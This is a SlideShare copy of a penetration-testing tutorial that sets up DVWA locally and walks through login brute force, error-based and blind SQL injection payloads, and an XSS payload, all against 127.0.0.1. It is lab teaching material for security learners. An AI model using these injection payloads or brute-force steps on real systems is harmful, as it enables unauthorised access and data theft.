SlideShare une entreprise Scribd logo

The practice of web application penetration testing

_
_U2_

The practice of web application penetration testing. How to build test environment, how to use brute force tool, how to execute SQL Injection, Cross site Scripting etc.

Technologie
1  sur  11
Télécharger pour lire hors ligne
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing target. First, you need build a test environment for yourself. If you are not good at building servers, we recommend you build a simple one with XAMPP. OS: Windows 7, 8 Software: XAMPP for Windows, download: https://www.apachefriends.org/zh_cn/index.html XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default installation path is c:xampp, please do not change it. Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and access with http://127.0.0.1 . After started, you can use the following command to set the password to 123456 (This is a weak password, just for example, please modify it) C:xamppmysqlbinmysqladmin -u root password 123456 Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to C:xampphtdocsdvwa, Then modify its configuration file, which is C:xampphtdocsdvwaconfigconfig.inc.php: $_DVWA[ 'db_server' ] = 'localhost'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = ‘123456’; $_DVWA['default_security_level'] = "low"; Open http://127.0.0.1/dvwa/setup.php , Click ”Create/Reset Database” to finish the installation. Access the front page of it and it will redirect to http://127.0.0.1/DVWA/login.php Now, a basic test environment is available. 2. DVWA Brute Force The first challenge of DVWA is how to login it. Usually, you can search the network and get the default username/password, or try to use SQL Injection to escape the authentication mechanism, such as use a username like admin’;-- or other ways. Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3 (http://www.janusec.com/ ) as a brute force tool. First, input any username and password, such as 123, 456, etc. submit.
Switch to Resend tab: We found there was a request list which includes requests we submit just now. Note that there is a button “Bruter”, click it, it will switch to Bruter tool. The username and password field has been identified automatically. The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom modifying.
Click “Go” to start guess process, result will be list in the window. Log in with the username and password. 3. SQL Injection Select “SQL Injection” menu, input 1 and submit: Input 1’ to try:
MySQL throw exception because of unpaired single quotes. Now, we can suspect that there is SQL Injection vulnerability here. Continue try 1 and 1=1 and 1 and 1=2 But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue try with 1' and '1'='1 and 1' and '1'='2
There is no result return to us when we input 1’ and ‘1’=’2 Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap : Criterion of SQL Injection Assume the initial response is Response0, Response by append true logic is Response1, Response by append false logic is Response2, If Response1= Response0, but Response1 != Response2, SQL Injection exists. OK, can you takeover some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x)a)%23 Well, the database name “dvwa” returns on the page. This case is a little complex; actually it builds an exception intentionally by twice rand computation. Another way is blind SQL Injection, by guest the length and ASCII of each byte of the field. To compute if the length of database name bigger than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1 Wrong, try less than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))<10 and '1'='1
Right, continue guess till: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1 We got the length is 4. Continue to guess each byte of it: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)) )=100 and %271%27=%271
The ASCII of the first byte is 100, it is d, and so on. http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of database is “dvwa” . Is there a tool which can do these tests instead? Yes, we can use a web application security scanner to do it. Take WebCruiser as an illustration, navigate page and click “ScanURL”: SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
continue click ”Get Environment Information”: 4. XSS Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/ Input text and script directly in the title and content field, such as: testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.
Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated vulnerability type (setting) or designated URL (ScanURL button) separately.

Recommandé

Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentationZara Joe
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Html web workers
Html web workersHtml web workers
Html web workersAbhishekMondal42
 
Struts database access
Struts database accessStruts database access
Struts database accessAbass Ndiaye
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership Database( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership DatabaseLiquidHub
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
 

Recommandé

Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentationZara Joe
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Html web workers
Html web workersHtml web workers
Html web workersAbhishekMondal42
 
Struts database access
Struts database accessStruts database access
Struts database accessAbass Ndiaye
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership Database( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership DatabaseLiquidHub
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
 
Session handling in codeigniter
Session handling in codeigniterSession handling in codeigniter
Session handling in codeigniterbaabtra.com - No. 1 supplier of quality freshers
 
Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injectionMickey Jack
 
POWER OF VISUALIZATION
POWER OF VISUALIZATIONPOWER OF VISUALIZATION
POWER OF VISUALIZATIONsihleGumede3
 
Js unit testing
Js unit testingJs unit testing
Js unit testingMihail Irintchev
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions
 
Server Sent Events
Server Sent EventsServer Sent Events
Server Sent EventsMohanad Obaid
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Cake php
Cake phpCake php
Cake phpJyotisankar Pradhan
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4Abhishek Kesharwani
 
Installation of Joomla on Windows XP
Installation of Joomla on Windows XPInstallation of Joomla on Windows XP
Installation of Joomla on Windows XPRupesh Kumar
 
Introduction about-ajax-framework
Introduction about-ajax-frameworkIntroduction about-ajax-framework
Introduction about-ajax-frameworkSakthi Bro
 
Protecting against injections at scale
Protecting against injections at scaleProtecting against injections at scale
Protecting against injections at scaleSqreen
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4Abhishek Kesharwani
 
jQuery basics
jQuery basicsjQuery basics
jQuery basicsKamal S
 
Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Magdalena Paciorek
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Asp
AspAsp
AspAdil Jafri
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injectionKagi Adrian Zinelli
 

Contenu connexe

Tendances

Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injectionMickey Jack
 
POWER OF VISUALIZATION
POWER OF VISUALIZATIONPOWER OF VISUALIZATION
POWER OF VISUALIZATIONsihleGumede3
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Installation of Joomla on Windows XP
Installation of Joomla on Windows XPInstallation of Joomla on Windows XP
Installation of Joomla on Windows XPRupesh Kumar
 
Introduction about-ajax-framework
Introduction about-ajax-frameworkIntroduction about-ajax-framework
Introduction about-ajax-frameworkSakthi Bro
 
Protecting against injections at scale
Protecting against injections at scaleProtecting against injections at scale
Protecting against injections at scaleSqreen
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
jQuery basics
jQuery basicsjQuery basics
jQuery basicsKamal S
 
Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Magdalena Paciorek
 

Tendances (17)

Session handling in codeigniter
Session handling in codeigniterSession handling in codeigniter
Session handling in codeigniter
 
Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injection
 
POWER OF VISUALIZATION
POWER OF VISUALIZATIONPOWER OF VISUALIZATION
POWER OF VISUALIZATION
 
Js unit testing
Js unit testingJs unit testing
Js unit testing
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Server Sent Events
Server Sent EventsServer Sent Events
Server Sent Events
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQL
 
Cake php
Cake phpCake php
Cake php
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4
 
Installation of Joomla on Windows XP
Installation of Joomla on Windows XPInstallation of Joomla on Windows XP
Installation of Joomla on Windows XP
 
Introduction about-ajax-framework
Introduction about-ajax-frameworkIntroduction about-ajax-framework
Introduction about-ajax-framework
 
Protecting against injections at scale
Protecting against injections at scaleProtecting against injections at scale
Protecting against injections at scale
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4
 
jQuery basics
jQuery basicsjQuery basics
jQuery basics
 
Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017
 

Similaire à The practice of web application penetration testing

Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Resilience Testing
Resilience Testing Resilience Testing
Resilience Testing Ran Levy
 
Open Script (OATS)
Open Script (OATS)Open Script (OATS)
Open Script (OATS)Anurag Deb
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Hongyang Wang
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development PracticesBrandon Dove
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
 
Sql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian AlexandrescuSql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian AlexandrescuCristian Alexandrescu
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersoazabir
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggyPVS-Studio
 

Similaire à The practice of web application penetration testing (20)

Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Asp
AspAsp
Asp
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Resilience Testing
Resilience Testing Resilience Testing
Resilience Testing
 
Open Script (OATS)
Open Script (OATS)Open Script (OATS)
Open Script (OATS)
 
Web Security
Web SecurityWeb Security
Web Security
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development Practices
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
Sql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian AlexandrescuSql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian Alexandrescu
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
 

Dernier

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 

Dernier (20)

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 

The practice of web application penetration testing

  • 1. The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing target. First, you need build a test environment for yourself. If you are not good at building servers, we recommend you build a simple one with XAMPP. OS: Windows 7, 8 Software: XAMPP for Windows, download: https://www.apachefriends.org/zh_cn/index.html XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default installation path is c:xampp, please do not change it. Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and access with http://127.0.0.1 . After started, you can use the following command to set the password to 123456 (This is a weak password, just for example, please modify it) C:xamppmysqlbinmysqladmin -u root password 123456 Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to C:xampphtdocsdvwa, Then modify its configuration file, which is C:xampphtdocsdvwaconfigconfig.inc.php: $_DVWA[ 'db_server' ] = 'localhost'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root';
  • 2. $_DVWA[ 'db_password' ] = ‘123456’; $_DVWA['default_security_level'] = "low"; Open http://127.0.0.1/dvwa/setup.php , Click ”Create/Reset Database” to finish the installation. Access the front page of it and it will redirect to http://127.0.0.1/DVWA/login.php Now, a basic test environment is available. 2. DVWA Brute Force The first challenge of DVWA is how to login it. Usually, you can search the network and get the default username/password, or try to use SQL Injection to escape the authentication mechanism, such as use a username like admin’;-- or other ways. Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3 (http://www.janusec.com/ ) as a brute force tool. First, input any username and password, such as 123, 456, etc. submit.
  • 3. Switch to Resend tab: We found there was a request list which includes requests we submit just now. Note that there is a button “Bruter”, click it, it will switch to Bruter tool. The username and password field has been identified automatically. The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom modifying.
  • 4. Click “Go” to start guess process, result will be list in the window. Log in with the username and password. 3. SQL Injection Select “SQL Injection” menu, input 1 and submit: Input 1’ to try:
  • 5. MySQL throw exception because of unpaired single quotes. Now, we can suspect that there is SQL Injection vulnerability here. Continue try 1 and 1=1 and 1 and 1=2 But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue try with 1' and '1'='1 and 1' and '1'='2
  • 6. There is no result return to us when we input 1’ and ‘1’=’2 Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap : Criterion of SQL Injection Assume the initial response is Response0, Response by append true logic is Response1, Response by append false logic is Response2, If Response1= Response0, but Response1 != Response2, SQL Injection exists. OK, can you takeover some data by exploiting it?
  • 7. Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x)a)%23 Well, the database name “dvwa” returns on the page. This case is a little complex; actually it builds an exception intentionally by twice rand computation. Another way is blind SQL Injection, by guest the length and ASCII of each byte of the field. To compute if the length of database name bigger than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1 Wrong, try less than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))<10 and '1'='1
  • 8. Right, continue guess till: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1 We got the length is 4. Continue to guess each byte of it: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)) )=100 and %271%27=%271
